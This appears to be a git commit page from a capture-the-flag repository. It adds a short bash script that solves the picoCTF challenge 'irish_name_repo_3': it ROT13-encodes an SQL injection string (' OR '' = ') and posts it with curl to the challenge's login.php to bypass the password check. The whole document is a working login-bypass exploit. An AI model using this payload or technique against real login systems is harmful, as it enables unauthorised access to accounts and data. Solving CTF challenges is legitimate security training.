web/irish_name_repo_3
This commit is contained in:
Executable
+8
@@ -0,0 +1,8 @@
|
||||
#!/usr/bin/env bash
|
||||
|
||||
PAYLOAD_RAW="' OR '' = '"
|
||||
PAYLOAD="$(tr 'A-Za-z' 'N-ZA-Mn-za-m' <<<"$PAYLOAD_RAW")"
|
||||
|
||||
curl 'http://fickle-tempest.picoctf.net:49659/login.php' \
|
||||
-X POST \
|
||||
--data-raw "debug=1&password=$PAYLOAD"
|
||||
Reference in New Issue
Block a user